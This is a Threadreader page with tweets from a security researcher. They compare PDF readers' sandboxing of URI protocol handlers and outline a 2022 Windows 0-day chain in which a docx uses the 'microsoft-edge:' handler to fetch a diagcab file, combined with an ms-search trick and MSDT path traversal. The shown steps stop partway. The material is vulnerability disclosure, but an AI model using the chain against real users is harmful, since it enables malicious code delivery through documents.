Share this page!

Enter URL or ID to Unroll

You can paste full URL like: https://x.com/threadreaderapp/status/1644127596119195649
or just the ID like: 1644127596119195649

How to get URL link on X (Twitter) App

  1. On the Twitter thread, click on or icon on the bottom
  2. Click again on or Share Via icon
  3. Click on Copy Link to Tweet
  4. Paste it above and click "Unroll Thread"!
  5. More info at Twitter Help
j00sean Profile picture
j00sean
@j00sean
Finding bugs everywhere
Jun 7, 2022 4 tweets 2 min read
What about PDF Readers?
Adobe Acrobat DC vs Foxit PDF Reader.
Surprisingly Adobe Acrobat's sandbox stops uri protocol handlers. Nice win for Adobe crew. No bypasses tested yet, though.
Jun 6, 2022 6 tweets 2 min read
microsoft-edge + ms-search + MSDT path traversal 0day = fun of 2-clicks (one click additional due to Protected View if docx is coming from remote btw). This is the full chain:

1) Open a docx which connects to a remote server to download a diagcab file by MS Edge. This uses the protocol handler "microsoft-edge". So easy as this: "microsoft-edge:http://127.0.0.1:8081/foo.html"

2) Use "ms-search" trick to open folder Downloads.